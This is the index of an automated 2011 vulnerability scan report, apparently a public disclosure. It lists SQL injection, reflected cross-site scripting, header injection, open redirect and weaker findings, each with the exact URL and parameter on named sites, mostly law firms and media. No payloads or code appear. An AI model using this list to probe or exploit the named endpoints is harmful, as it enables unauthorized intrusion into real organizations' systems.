XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05122011-04

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 12 19:54:51 CDT 2011.

Loading

1. SQL injection

1.1. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json [dt cookie]

1.2. http://layserfreiwald.com/attorneys.html [AID parameter]

1.3. http://www.mccarter.com/new/biosnew.aspx [Initial parameter]

1.4. http://www.mccarter.com/new/homenew.aspx [show parameter]

1.5. http://www.mccarter.com/new/showbionew.aspx [show parameter]

1.6. http://www.mccarter.com/new/showcareerpagenew.aspx [show parameter]

1.7. http://www.mccarter.com/new/showeventnew.aspx [show parameter]

1.8. http://www.mccarter.com/new/showlocationnew.aspx [show parameter]

1.9. http://www.peckshaffer.com/bonds.php [name of an arbitrarily supplied request parameter]

1.10. http://www.peckshaffer.com/bonds.php [page parameter]

1.11. http://www.pillsburylaw.com/ [CFID cookie]

1.12. http://www.pillsburylaw.com/ [CFTOKEN cookie]

1.13. http://www.pillsburylaw.com/ [MEDIAUSERID cookie]

1.14. http://www.pillsburylaw.com/ [MEDIAUSERNAME cookie]

1.15. http://www.pillsburylaw.com/ [PCONNECTID cookie]

1.16. http://www.pillsburylaw.com/ [PCUSERNAME cookie]

1.17. http://www.pillsburylaw.com/ [__utma cookie]

1.18. http://www.pillsburylaw.com/ [__utmc cookie]

1.19. http://www.pillsburylaw.com/ [__utmz cookie]

1.20. http://www.pillsburylaw.com/ [hsfirstvisit cookie]

1.21. http://www.pillsburylaw.com/ [hubspotdt cookie]

1.22. http://www.pillsburylaw.com/ [hubspotutk cookie]

1.23. http://www.pillsburylaw.com/ [hubspotvd cookie]

1.24. http://www.pillsburylaw.com/ [hubspotvm cookie]

1.25. http://www.pillsburylaw.com/ [hubspotvw cookie]

1.26. http://www.pillsburylaw.com/404.htm [REST URL parameter 1]

1.27. http://www.pillsburylaw.com/a [CFID cookie]

1.28. http://www.pillsburylaw.com/a [CFTOKEN cookie]

1.29. http://www.pillsburylaw.com/a [MEDIAUSERID cookie]

1.30. http://www.pillsburylaw.com/a [MEDIAUSERNAME cookie]

1.31. http://www.pillsburylaw.com/a [PCONNECTID cookie]

1.32. http://www.pillsburylaw.com/a [PCUSERNAME cookie]

1.33. http://www.pillsburylaw.com/a [REST URL parameter 1]

1.34. http://www.pillsburylaw.com/a [__utma cookie]

1.35. http://www.pillsburylaw.com/a [__utmc cookie]

1.36. http://www.pillsburylaw.com/a [__utmz cookie]

1.37. http://www.pillsburylaw.com/a [hsfirstvisit cookie]

1.38. http://www.pillsburylaw.com/a [hubspotdt cookie]

1.39. http://www.pillsburylaw.com/a [hubspotutk cookie]

1.40. http://www.pillsburylaw.com/a [hubspotvd cookie]

1.41. http://www.pillsburylaw.com/a [hubspotvm cookie]

1.42. http://www.pillsburylaw.com/a [hubspotvw cookie]

1.43. http://www.pillsburylaw.com/connect_forgotpassword.cfm [CFID cookie]

1.44. http://www.pillsburylaw.com/connect_forgotpassword.cfm [CFTOKEN cookie]

1.45. http://www.pillsburylaw.com/connect_forgotpassword.cfm [MEDIAUSERID cookie]

1.46. http://www.pillsburylaw.com/connect_forgotpassword.cfm [MEDIAUSERNAME cookie]

1.47. http://www.pillsburylaw.com/connect_forgotpassword.cfm [PCONNECTID cookie]

1.48. http://www.pillsburylaw.com/connect_forgotpassword.cfm [PCUSERNAME cookie]

1.49. http://www.pillsburylaw.com/connect_forgotpassword.cfm [REST URL parameter 1]

1.50. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utma cookie]

1.51. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmb cookie]

1.52. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmc cookie]

1.53. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmz cookie]

1.54. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hsfirstvisit cookie]

1.55. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotdt cookie]

1.56. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotutk cookie]

1.57. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvd cookie]

1.58. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvm cookie]

1.59. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvw cookie]

1.60. http://www.pillsburylaw.com/index.cfm [CFID cookie]

1.61. http://www.pillsburylaw.com/index.cfm [CFTOKEN cookie]

1.62. http://www.pillsburylaw.com/index.cfm [MEDIAUSERID cookie]

1.63. http://www.pillsburylaw.com/index.cfm [MEDIAUSERNAME cookie]

1.64. http://www.pillsburylaw.com/index.cfm [PCONNECTID cookie]

1.65. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]

1.66. http://www.pillsburylaw.com/index.cfm [REST URL parameter 1]

1.67. http://www.pillsburylaw.com/index.cfm [__utma cookie]

1.68. http://www.pillsburylaw.com/index.cfm [__utmb cookie]

1.69. http://www.pillsburylaw.com/index.cfm [__utmc cookie]

1.70. http://www.pillsburylaw.com/index.cfm [__utmz cookie]

1.71. http://www.pillsburylaw.com/index.cfm [hsfirstvisit cookie]

1.72. http://www.pillsburylaw.com/index.cfm [hubspotdt cookie]

1.73. http://www.pillsburylaw.com/index.cfm [hubspotutk cookie]

1.74. http://www.pillsburylaw.com/index.cfm [hubspotvd cookie]

1.75. http://www.pillsburylaw.com/index.cfm [hubspotvm cookie]

1.76. http://www.pillsburylaw.com/index.cfm [hubspotvw cookie]

1.77. http://www.pillsburylaw.com/scripts/general.css [REST URL parameter 1]

1.78. http://www.pillsburylaw.com/scripts/general.css [REST URL parameter 2]

1.79. http://www.pillsburylaw.com/scripts/images/arrows-default.png [CFID cookie]

1.80. http://www.pillsburylaw.com/scripts/images/arrows-default.png [CFTOKEN cookie]

1.81. http://www.pillsburylaw.com/scripts/images/arrows-default.png [MEDIAUSERID cookie]

1.82. http://www.pillsburylaw.com/scripts/images/arrows-default.png [MEDIAUSERNAME cookie]

1.83. http://www.pillsburylaw.com/scripts/images/arrows-default.png [PCONNECTID cookie]

1.84. http://www.pillsburylaw.com/scripts/images/arrows-default.png [PCUSERNAME cookie]

1.85. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 1]

1.86. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 2]

1.87. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 3]

1.88. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utma cookie]

1.89. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmb cookie]

1.90. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmc cookie]

1.91. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmz cookie]

1.92. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hsfirstvisit cookie]

1.93. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotdt cookie]

1.94. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotutk cookie]

1.95. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvd cookie]

1.96. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvm cookie]

1.97. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvw cookie]

1.98. http://www.pillsburylaw.com/scripts/menu.css [REST URL parameter 1]

1.99. http://www.pillsburylaw.com/scripts/menu.css [REST URL parameter 2]

1.100. http://www.pomerantzlaw.com/cases.html [CaseID parameter]

1.101. http://www.pomerantzlaw.com/cases.html [CaseID parameter]

1.102. http://www.pomerantzlaw.com/practice-areas.html [PracticeAreaID parameter]

1.103. http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html [User-Agent HTTP header]

1.104. http://www.superlawyers.com/redir [User-Agent HTTP header]

1.105. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm [NewsID parameter]

1.106. http://www.wiggin.com/showarea.aspx [Show parameter]

2. File path traversal

3. XPath injection

4. HTTP header injection

4.1. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5 [REST URL parameter 1]

4.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3 [REST URL parameter 1]

5. Cross-site scripting (reflected)

5.1. http://ds.addthis.com/red/psi/sites/www.dmoc.com/p.json [callback parameter]

5.2. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter]

5.3. http://ds.addthis.com/red/psi/sites/www.letipli.com/p.json [callback parameter]

5.4. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter]

5.5. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json [callback parameter]

5.6. http://ds.addthis.com/red/psi/sites/www.wi-ala.org/p.json [callback parameter]

5.7. http://gigablast.com/ [c parameter]

5.8. http://labs.natpal.com/trac/js/ena.js [trkDomain parameter]

5.9. http://layserfreiwald.com/attorneys.html [mode parameter]

5.10. http://m.perkinscoie.com/publications/ [name of an arbitrarily supplied request parameter]

5.11. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php [REST URL parameter 1]

5.12. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php [name of an arbitrarily supplied request parameter]

5.13. http://www.gartner.com/0_admin/PasswordRequest.jsp [startPage parameter]

5.14. http://www.gigablast.com/ [c parameter]

5.15. http://www.gigablast.com/search [q parameter]

5.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

5.17. http://www.hartfordbusiness.com/fs_webkit/fs_css_processor.php [src parameter]

5.18. http://www.hartfordbusiness.com/news14300.html [REST URL parameter 1]

5.19. http://www.letipli.com/favicon.ico [REST URL parameter 1]

5.20. http://www.letipli.com/member_details.asp [REST URL parameter 1]

5.21. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 1]

5.22. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 2]

5.23. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 3]

5.24. http://www.mccarter.com/new/homenew.aspx [name of an arbitrarily supplied request parameter]

5.25. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]

5.26. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]

5.27. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]

5.28. http://www.ngelaw.com/about/honors_awards.aspx [name of an arbitrarily supplied request parameter]

5.29. http://www.ngelaw.com/attorney/attorney.aspx [name of an arbitrarily supplied request parameter]

5.30. http://www.ngelaw.com/attorney/bio.aspx [name of an arbitrarily supplied request parameter]

5.31. http://www.ngelaw.com/attorney/results.aspx [letter parameter]

5.32. http://www.ngelaw.com/attorney/results.aspx [name of an arbitrarily supplied request parameter]

5.33. http://www.ngelaw.com/news/detail.aspx [name of an arbitrarily supplied request parameter]

5.34. http://www.ngelaw.com/news/event_detail.aspx [name of an arbitrarily supplied request parameter]

5.35. http://www.ngelaw.com/news/events.aspx [name of an arbitrarily supplied request parameter]

5.36. http://www.ngelaw.com/news/publications.aspx [name of an arbitrarily supplied request parameter]

5.37. http://www.ngelaw.com/practice/practice.aspx [name of an arbitrarily supplied request parameter]

5.38. http://www.nytimes.com/2007/02/09/business/09legal.html [REST URL parameter 5]

5.39. http://www.nytimes.com/2009/01/13/business/13bail.html [REST URL parameter 5]

5.40. http://www.nytimes.com/2009/06/19/business/19scrushy.html [REST URL parameter 5]

5.41. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html [name of an arbitrarily supplied request parameter]

5.42. http://www.ober.com/favicon.ico [REST URL parameter 1]

5.43. http://www.ober.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.44. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible [REST URL parameter 1]

5.45. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible [REST URL parameter 2]

5.46. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible [name of an arbitrarily supplied request parameter]

5.47. http://www.ober.com/practices/32 [REST URL parameter 1]

5.48. http://www.ober.com/practices/32 [REST URL parameter 2]

5.49. http://www.ober.com/practices/32 [name of an arbitrarily supplied request parameter]

5.50. http://www.ober.com/practices/55 [REST URL parameter 1]

5.51. http://www.ober.com/practices/55 [REST URL parameter 2]

5.52. http://www.ober.com/practices/55 [name of an arbitrarily supplied request parameter]

5.53. http://www.ober.com/practices/index [REST URL parameter 1]

5.54. http://www.ober.com/practices/index [REST URL parameter 2]

5.55. http://www.ober.com/practices/index [name of an arbitrarily supplied request parameter]

5.56. http://www.ober.com/practices/intellectual-property [REST URL parameter 1]

5.57. http://www.ober.com/practices/intellectual-property [REST URL parameter 2]

5.58. http://www.ober.com/practices/intellectual-property [name of an arbitrarily supplied request parameter]

5.59. http://www.pillsburylaw.com/connect_forgotpassword.cfm [name of an arbitrarily supplied request parameter]

5.60. http://www.pillsburylaw.com/connect_forgotpassword.cfm [p parameter]

5.61. http://www.pillsburylaw.com/index.cfm [name of an arbitrarily supplied request parameter]

5.62. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP [REST URL parameter 4]

5.63. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP [name of an arbitrarily supplied request parameter]

5.64. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver [REST URL parameter 4]

5.65. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver [name of an arbitrarily supplied request parameter]

5.66. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP [REST URL parameter 4]

5.67. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP [name of an arbitrarily supplied request parameter]

5.68. http://www.wiggin.com/about.aspx [REST URL parameter 1]

5.69. http://www.wiggin.com/about.aspx [name of an arbitrarily supplied request parameter]

5.70. http://www.wiggin.com/about.aspx [name of an arbitrarily supplied request parameter]

5.71. http://www.wiggin.com/alumni.aspx [REST URL parameter 1]

5.72. http://www.wiggin.com/alumni.aspx [name of an arbitrarily supplied request parameter]

5.73. http://www.wiggin.com/alumni.aspx [name of an arbitrarily supplied request parameter]

5.74. http://www.wiggin.com/alumniregistration.aspx [REST URL parameter 1]

5.75. http://www.wiggin.com/alumniregistration.aspx [name of an arbitrarily supplied request parameter]

5.76. http://www.wiggin.com/alumniregistration.aspx [name of an arbitrarily supplied request parameter]

5.77. http://www.wiggin.com/areas.aspx [REST URL parameter 1]

5.78. http://www.wiggin.com/areas.aspx [name of an arbitrarily supplied request parameter]

5.79. http://www.wiggin.com/areas.aspx [name of an arbitrarily supplied request parameter]

5.80. http://www.wiggin.com/bios.aspx [REST URL parameter 1]

5.81. http://www.wiggin.com/bios.aspx [name of an arbitrarily supplied request parameter]

5.82. http://www.wiggin.com/bios.aspx [name of an arbitrarily supplied request parameter]

5.83. http://www.wiggin.com/careers.aspx [REST URL parameter 1]

5.84. http://www.wiggin.com/careers.aspx [name of an arbitrarily supplied request parameter]

5.85. http://www.wiggin.com/careers.aspx [name of an arbitrarily supplied request parameter]

5.86. http://www.wiggin.com/index.aspx [REST URL parameter 1]

5.87. http://www.wiggin.com/index.aspx [name of an arbitrarily supplied request parameter]

5.88. http://www.wiggin.com/index.aspx [name of an arbitrarily supplied request parameter]

5.89. http://www.wiggin.com/resource/404.aspx [REST URL parameter 2]

5.90. http://www.wiggin.com/resource/cal.js [REST URL parameter 1]

5.91. http://www.wiggin.com/resource/cal.js [REST URL parameter 2]

5.92. http://www.wiggin.com/resource/cal.js [name of an arbitrarily supplied request parameter]

5.93. http://www.wiggin.com/resource/showoffice.aspx [REST URL parameter 2]

5.94. http://www.wiggin.com/showAdvisory.aspx [REST URL parameter 1]

5.95. http://www.wiggin.com/showSupremeCourtUpdate.aspx [REST URL parameter 1]

5.96. http://www.wiggin.com/showarea.aspx [REST URL parameter 1]

5.97. http://www.wiggin.com/showarea.aspx [name of an arbitrarily supplied request parameter]

5.98. http://www.wiggin.com/showarea.aspx [name of an arbitrarily supplied request parameter]

5.99. http://www.wiggin.com/showbio.aspx [REST URL parameter 1]

5.100. http://www.wiggin.com/showdepartment.aspx [REST URL parameter 1]

5.101. http://www.wiggin.com/showevent.aspx [REST URL parameter 1]

5.102. http://www.wiggin.com/shownews.aspx [REST URL parameter 1]

5.103. http://www.wiggin.com/showoffice.aspx [REST URL parameter 1]

5.104. http://www.wi-ala.org/clubportal/loginretrieval.cfm [Referer HTTP header]

5.105. http://pillsburylaw.app4.hubspot.com/salog.js.aspx [hsfirstvisit cookie]

5.106. http://pillsburylaw.app4.hubspot.com/salog.js.aspx [hubspotutk cookie]

5.107. http://seg.sharethis.com/getSegment.php [__stid cookie]

5.108. http://www.pillsburylaw.com/ [PCUSERNAME cookie]

5.109. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]

6. Flash cross-domain policy

6.1. http://ad.doubleclick.net/crossdomain.xml

6.2. http://attorney.findlaw.com/crossdomain.xml

6.3. http://b.scorecardresearch.com/crossdomain.xml

6.4. http://capgroup.112.2o7.net/crossdomain.xml

6.5. http://cspix.media6degrees.com/crossdomain.xml

6.6. http://d1.openx.org/crossdomain.xml

6.7. http://ehg-findlaw.hitbox.com/crossdomain.xml

6.8. http://ox-d.gartner.com/crossdomain.xml

6.9. http://pixel.33across.com/crossdomain.xml

6.10. http://u.openx.net/crossdomain.xml

6.11. http://www.bloomberg.com/crossdomain.xml

6.12. http://www.nldhlaw.com/crossdomain.xml

6.13. http://feeds.bbci.co.uk/crossdomain.xml

6.14. http://googleads.g.doubleclick.net/crossdomain.xml

6.15. http://imagesrv.gartner.com/crossdomain.xml

6.16. https://my.gartner.com/crossdomain.xml

6.17. http://newsrss.bbc.co.uk/crossdomain.xml

6.18. http://timespeople.nytimes.com/crossdomain.xml

6.19. http://w.sharethis.com/crossdomain.xml

6.20. http://www.cnbc.com/crossdomain.xml

6.21. http://www.forbes.com/crossdomain.xml

6.22. http://www.ft.com/crossdomain.xml

6.23. http://www.gartner.com/crossdomain.xml

6.24. https://www.gartner.com/crossdomain.xml

6.25. http://www.law.com/crossdomain.xml

6.26. http://www.marketwatch.com/crossdomain.xml

6.27. http://www.npr.org/crossdomain.xml

6.28. http://www.nytimes.com/crossdomain.xml

6.29. http://www.stumbleupon.com/crossdomain.xml

6.30. http://www.usatoday.com/crossdomain.xml

6.31. http://www.washingtonpost.com/crossdomain.xml

6.32. http://centrifugesystems.app101.hubspot.com/crossdomain.xml

6.33. http://pillsburylaw.app4.hubspot.com/crossdomain.xml

6.34. http://www.boston.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://attorney.findlaw.com/clientaccesspolicy.xml

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.4. http://capgroup.112.2o7.net/clientaccesspolicy.xml

7.5. http://pixel.33across.com/clientaccesspolicy.xml

7.6. http://www.usatoday.com/clientaccesspolicy.xml

7.7. http://www.cnbc.com/clientaccesspolicy.xml

7.8. http://www.microsoft.com/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

8.2. http://www.hartfordbusiness.com/news14300.html

8.3. http://www.hartfordbusiness.com/news14300.html

8.4. http://www.orangecountyala.org/clubportal/memlogin.cfm

8.5. http://www.pillsburylaw.com/

8.6. http://www.pillsburylaw.com/index.cfm

8.7. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

8.8. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

8.9. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

8.10. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

8.11. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

8.12. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

8.13. http://www.wi-ala.org/ClubPortal/wala/

8.14. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

8.15. http://www.wi-ala.org/clubportal/memLogin.cfm

8.16. http://www.wi-ala.org/clubportal/wala/Page.cfm

9. XML injection

9.1. http://gigablast.com/ [c parameter]

9.2. http://www.gigablast.com/ [c parameter]

10. SQL statement in request parameter

11. SSL cookie without secure flag set

11.1. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/clientDetectionOutputs.aspx

11.2. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/clientDetectionVariablesForPost.aspx

11.3. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/login.aspx

11.4. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/login.aspx

11.5. https://my.gartner.com/portal/server.pt

11.6. https://www.gartner.com/login/loginInitAction.do

11.7. https://sso.gartner.com/sp/startSSO.ping

12. Session token in URL

13. SSL certificate

13.1. https://sa-live.com/

13.2. https://citrix.howardrice.com/

13.3. https://client.poynerspruill.com/

13.4. https://mail.howardrice.com/

13.5. https://my.gartner.com/

13.6. https://sso.gartner.com/

13.7. https://www.gartner.com/

13.8. https://www.google.com/

13.9. https://www.pillsburylaw.com/

14. Password field submitted using GET method

15. ASP.NET ViewState without MAC enabled

15.1. http://www.howardrice.com/

15.2. http://www.howardrice.com/6862

15.3. http://www.howardrice.com/Alumni

15.4. http://www.howardrice.com/Events

16. Open redirection

16.1. http://gigablast.com/ [redir parameter]

16.2. https://sa-live.com/l [url parameter]

16.3. http://www.gigablast.com/ [redir parameter]

17. Cookie scoped to parent domain

17.1. http://www.gartner.com/include/webtrends.jsp

17.2. http://www.gartner.com/js/optionsArray.jsp

17.3. http://www.gartner.com/technology/home.jsp

17.4. http://www.gartner.com/technology/include/metricsHelper.jsp

17.5. http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941

17.6. http://attorney.findlaw.com/b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657

17.7. http://attorney.findlaw.com/b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943

17.8. http://b.scorecardresearch.com/b

17.9. http://c.statcounter.com/t.php

17.10. http://cf.addthis.com/red/p.json

17.11. http://cspix.media6degrees.com/orbserv/hbpix

17.12. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json

17.13. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json

17.14. http://ehg-findlaw.hitbox.com/HG

17.15. http://ehg-findlaw.hitbox.com/HGct

17.16. http://id.google.com/verify/EAAAAC-ut1obpQ8XP13MxYguTAY.gif

17.17. http://id.google.com/verify/EAAAAM2aT2sSooWAii6U_OlsGlM.gif

17.18. http://id.google.com/verify/EAAAAMIzcwu2zbAQKxdU-MyvDzM.gif

17.19. http://labs.natpal.com/trk/pixel

17.20. http://maps.google.com/maps

17.21. http://meter-svc.nytimes.com/meter.js

17.22. http://pixel.33across.com/ps/

17.23. http://r.openx.net/set

17.24. http://u.openx.net/w/1.0/sc

17.25. http://vlog.leadforce1.com/bf/bf.php

17.26. http://www.bing.com/fd/fb/r

17.27. http://www.bing.com/fd/ls/GLinkPing.aspx

17.28. http://www.bing.com/search

17.29. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

17.30. http://www.google.com/finance

17.31. http://www.linkedin.com/companies/peck-shaffer-&-williams

17.32. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

17.33. http://www.nytimes.com/2007/02/09/business/09legal.html

17.34. http://www.nytimes.com/2009/01/13/business/13bail.html

17.35. http://www.nytimes.com/2009/06/19/business/19scrushy.html

17.36. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html

18. Cookie without HttpOnly flag set

18.1. http://baxterhall.com/

18.2. http://layserfreiwald.com/

18.3. http://mail.howardrice.com/

18.4. https://my.gartner.com/portal/server.pt

18.5. http://www.elfaonline.org/pub/news/indnews/news_report.cfm

18.6. http://www.emergingvision.com/our_brands.html

18.7. http://www.fundingpost.com/breakfast/reg1.asp

18.8. http://www.gartner.com/technology/home.jsp

18.9. http://www.gartner.com/technology/include/metricsHelper.jsp

18.10. http://www.glaala.org/clubportal/glaala/index.cfm

18.11. http://www.goclubexe.com/clubportal/

18.12. http://www.hartfordbusiness.com/news14300.html

18.13. http://www.jdtplaw.com/

18.14. http://www.jdtplaw.com/

18.15. http://www.jdtplaw.com/CM/Custom/ClientSuccesses.asp

18.16. http://www.jdtplaw.com/CM/NewsResources/JDTP-Listed-in-Martindale-Hubbells-Bar-Register-of-Preeminent-Lawyers.asp

18.17. http://www.jdtplaw.com/PracticeAreas/Real-Estate.asp

18.18. http://www.law.com/jsp/article.jsp

18.19. http://www.law.com/jsp/nj/PubArticleNJ.jsp

18.20. http://www.layserfreiwald.com/

18.21. http://www.letipli.com/_rknet_css.asp

18.22. http://www.letipli.com/member_details.asp

18.23. http://www.linkedin.com/companies/peck-shaffer-&-williams

18.24. http://www.mccarter.com/

18.25. http://www.mccarter.com/new/homenew.aspx

18.26. http://www.mccarter.com/new/showlocationnew.aspx

18.27. http://www.memberize.com/

18.28. http://www.milbank.com/en

18.29. http://www.ngelaw.com/

18.30. http://www.njbiz.com/article.asp

18.31. http://www.njsba.com/calendar_events/annualMeetingBlog/index.cfm

18.32. http://www.nldhlaw.com/

18.33. http://www.orangecountyala.org/clubportal/ocala/

18.34. http://www.pillsburylaw.com/

18.35. http://www.pillsburylaw.com/a

18.36. http://www.pillsburylaw.com/connect_forgotpassword.cfm

18.37. http://www.pillsburylaw.com/index.cfm

18.38. http://www.pillsburylaw.com/scripts/images/arrows-default.png

18.39. http://www.powelltrachtman.com/

18.40. http://www.powelltrachtman.com/CM/Custom/Case-Studies.asp

18.41. http://www.rothmanconsulting.com/

18.42. http://www.rtacpa.com/

18.43. http://www.semmes.com/attorney_search.asp

18.44. http://www.sleepertechnologies.com/

18.45. http://www.smithmazure.com/

18.46. http://www.superlawyers.com/redir

18.47. http://www.sutphinblvdbid.org/

18.48. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

18.49. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

18.50. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

18.51. http://www.wendel.com/

18.52. http://www.wi-ala.org/

18.53. http://www.wi-ala.org/ClubPortal/wala/

18.54. http://www.wi-ala.org/clubportal/

18.55. http://www.wiggin.com/

18.56. http://ads.keypromedia.com/www/delivery/ajs.php

18.57. http://ads.keypromedia.com/www/delivery/lg.php

18.58. http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941

18.59. http://attorney.findlaw.com/b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657

18.60. http://attorney.findlaw.com/b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943

18.61. http://b.scorecardresearch.com/b

18.62. http://c.statcounter.com/t.php

18.63. http://capgroup.112.2o7.net/b/ss/capgroupprod/1/H.15.1/s41646418426182

18.64. http://centrifugesystems.app101.hubspot.com/salog.js.aspx

18.65. http://cf.addthis.com/red/p.json

18.66. http://cspix.media6degrees.com/orbserv/hbpix

18.67. http://d1.openx.org/spc.php

18.68. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json

18.69. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json

18.70. http://ehg-findlaw.hitbox.com/HG

18.71. http://ehg-findlaw.hitbox.com/HG

18.72. http://ehg-findlaw.hitbox.com/HG

18.73. http://ehg-findlaw.hitbox.com/HGct

18.74. http://ehg-findlaw.hitbox.com/HGct

18.75. http://ehg-findlaw.hitbox.com/HGct

18.76. http://labs.natpal.com/trk/pixel

18.77. http://m.perkinscoie.com/

18.78. http://m.perkinscoie.com/practices/

18.79. http://m.perkinscoie.com/publications/

18.80. http://maps.google.com/maps

18.81. http://meter-svc.nytimes.com/meter.js

18.82. http://ox-d.gartner.com/w/1.0/ajs

18.83. http://pillsburylaw.app4.hubspot.com/salog.js.aspx

18.84. http://pixel.33across.com/ps/

18.85. http://r.openx.net/set

18.86. https://sso.gartner.com/sp/startSSO.ping

18.87. http://u.openx.net/w/1.0/sc

18.88. http://vlog.leadforce1.com/bf/bf.php

18.89. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

18.90. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

18.91. http://www.bing.com/fd/fb/r

18.92. http://www.bing.com/fd/ls/GLinkPing.aspx

18.93. http://www.bing.com/search

18.94. http://www.capgroup.com/

18.95. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

18.96. http://www.gartner.com/0_admin/TechnicalSupportPhone.jsp

18.97. http://www.gartner.com/5_about/company_information/images/privacy_disclosure_head2.gif

18.98. http://www.gartner.com/5_about/news/css/content.css

18.99. http://www.gartner.com/7_search/js/Options.js

18.100. http://www.gartner.com/css/menu.css

18.101. http://www.gartner.com/css/win/homepage.css

